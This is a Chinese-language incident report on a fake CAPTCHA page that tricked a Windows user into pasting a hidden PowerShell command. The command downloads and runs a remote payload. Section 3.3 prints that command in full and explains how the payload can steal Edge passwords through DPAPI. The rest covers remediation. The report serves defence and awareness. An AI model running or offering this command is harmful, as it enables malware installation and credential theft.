网络安全事件报告——伪CAPTCHA诱骗用户运行危险的PowerShell脚本
网络安全事件报告——伪CAPTCHA诱骗用户运行危险的PowerShell脚本
报告编号:SEC-20260630-001
报告日期:2026年6月30日
报告人:工业废气
受影响设备:个人计算机(Windows系统)
事件等级:中危(恶意代码执行,凭证泄露风险高)
一、事件概述
2026年6月30日,用户访问一个长期无法正常连接的BT下载网站时,被重定向至恶意域名claspopclicktodayinstantly.monster。该页面伪装成CAPTCHA人机验证,诱导用户通过“Win+X”运行一段经过伪装的恶意PowerShell命令。用户执行命令后,安全软件(360安全卫士)成功拦截了后续释放的木马程序,但命令在内存中执行时可能已完成对浏览器保存密码等敏感信息的窃取。
二、攻击时间线
| 时间节点 | 事件描述 |
|---|---|
| 今天早些时候 | 访问已失效的BT站,被跳转至恶意钓鱼页面 |
| 跳转后 | 页面显示“人机验证”,要求按Win+X再按I键粘贴命令 |
| 执行命令 | 运行恶意PowerShell命令,系统以隐藏窗口执行 |
| 命令执行后 | 从远程下载恶意脚本,在内存中执行,释放木马至Temp目录 |
| 随后 | 360拦截进程创建(conhost.exe),删除木马文件 |
| 当前状态 | 用户再次访问该BT站已无法连接,恶意跳转已消失 |
三、攻击手段技术分析
3.1 初始入侵点(跳转机制)
- 原BT站域名已长期无法访问,本次跳转并非原站被篡改,极可能是由DNS污染/劫持、本机hosts文件被篡改或路由器DNS被恶意修改所致。
- 跳转目标
claspopclicktodayinstantly.monster具有典型的一次性诈骗域名特征(随机词堆叠、廉价顶级域)。
3.2 社会工程学诱导
- 页面模仿正规的CAPTCHA人机验证流程,要求用户执行组合键
Win+X,再按下I键打开PowerShell,并粘贴一段看似含有“验证ID”的代码。 - 代码中的注释
<#Verification ID: 35300a89e82c4da3#>增强了欺骗性,降低用户警惕性。
3.3 攻击来源识别
执行的命令为:
powershell-w h"iex(irm 'idverification-cdn.info/35300a89e82c4da3' -UseBasicParsing)";exit<#Verification ID: 35300a89e82c4da3#>各部分功能:
| 组件 | 含义 |
|---|---|
-w h | -WindowStyle Hidden,隐藏PowerShell窗口 |
iex | Invoke-Expression,将从网络获取的字符串作为代码执行 |
irm | Invoke-RestMethod,从指定URL下载内容 |
idverification-cdn.info/... | 攻击者控制的载荷存放地址(含追踪ID) |
; exit | 执行后立即退出,减少暴露窗口 |
<#...#> | PowerShell块注释,伪装成“验证ID” |
该技术属于典型的无文件攻击(Fileless Malware):恶意代码全程在内存中运行,不直接写入磁盘,绕过传统基于文件的杀毒检测。直到最后释放的.exe文件被360拦截。
3.4 密码窃取原理
攻击者一旦在用户账户下运行,便可利用Windows数据保护接口(DPAPI)解密存储在Microsoft Edge浏览器中的密码。因为用户已登录系统,DPAPI会自动提供解密密钥。因此,内存中的脚本可以轻松读取并上传浏览器中所有保存的网站明文密码、Cookie等信息。
四、已发生的恶意行为与拦截情况
恶意进程释放:木马文件
fhdnhrxs.ioz.exe被释放到C:\Users\Administrator\AppData\Local\Temp\tmgjecmf.h3q\。进程创建企图:木马试图创建子进程
C:\Windows\System32\conhost.exe,以承载后续后门或记录行为。安全软件响应:360安全卫士实时防护模块识别为
Trojan.Generic,成功拦截进程创建并删除木马文件。进程:C:\Users\Administrator\AppData\Local\Temp\tmgjecmf.h3q\fhdnhrxs.ioz.exe 动作:进程创建 路径:C:\Windows\System32\conhost.exe 拦截补充描述:有木马试图攻击您的电脑,360已成功拦截。 防护信息: AD|1, 4|10, 70, 10||木马名称:Trojan.Generic 所在路径:C:\Users\Administrator\AppData\Local\Temp\tmgjecmf.h3q\fhdnhrxs.ioz.exe
五、潜在风险与影响评估
尽管木马落地组件被清除,但由于PowerShell命令已在内存中执行,以下风险仍可能已经发生:
- 浏览器凭证泄露:Edge中保存的所有密码、Cookie极可能已被明文上传至攻击者服务器。
- 令牌与会话窃取:部分网站的自动登录令牌可能被盗,导致攻击者能绕过密码直接登录。
- 系统残留:恶意命令可能修改了系统hosts文件、设置了代理,或创建了计划任务以维持长期访问。
- 二次跳板:该BT站域名被篡改的解析记录可能仍存在于本地DNS缓存或网络设备中,存在再次被跳转的风险。
六、已采取及建议的处置措施
6.1 立即执行(已完成或正在进行)
- 360安全卫士实时防护拦截并清除了木马文件。
- 确认恶意进程未继续运行。
- 在手机或其他未受影响的设备上,立即修改所有在Edge中保存过的网站密码(重点:邮箱、网银、社交账号)。
- 为所有重要账户开启双因素认证(2FA)。
6.2 系统排查与清理(务必执行)
- 检查hosts文件
用记事本打开C:\Windows\System32\drivers\etc\hosts,删除任何指向该BT站域名的条目。 - 检查系统代理设置
进入“设置 → 网络和 Internet → 代理”,确保“使用代理服务器”为关闭状态,且无异常自动配置脚本。 - 检查浏览器扩展与快捷方式
- 打开
edge://extensions,移除非必要的可疑扩展。 - 检查Edge快捷方式属性,确保目标路径后无恶意加载参数。
- 打开
- 检查任务计划程序
打开“任务计划程序”,查找近期创建的名称随机或内容可疑的任务,确认后删除。 - 检查路由器DNS
登录路由器管理后台,确认DHCP分配DNS未被篡改(推荐改用1.1.1.1或8.8.8.8)。 - 启用DNS安全
在Edge中启用“使用安全的DNS”,选择Cloudflare或Google,规避DNS污染。 - 全盘扫描
使用360安全卫士执行“全盘扫描”,并用Malwarebytes等第二意见扫描器进行交叉查杀。 - 清理浏览器数据
在edge://settings/siteData中搜索并删除该BT站域名及恶意跳转域名的所有存储数据。
6.3 长期加固建议
- 提高安全意识:任何要求通过“Win+X”粘贴代码的验证方法均为欺诈,应立即关闭页面。
- 定期修改重要密码,不重复使用相同密码。
- 使用密码管理器(如Bitwarden)替代浏览器原生密码存储,可提供更强的防护。
七、结论
本次事件是一起结合了DNS劫持/污染、社会工程学和无文件攻击的复合型网络攻击。攻击者利用用户对失效网站的访问惯性和对CAPTCHA“安全性”的默认信任,将流量诱导至精心设计的钓鱼页面,进而窃取敏感凭证。得益于安全软件的行为拦截,木马未能在本地建立持久化后门,但信息泄露风险仍然较高。当前最紧迫的行动是彻底修改受影响密码,并完成上述系统排查项目,以根除残留隐患和防止二次跳转。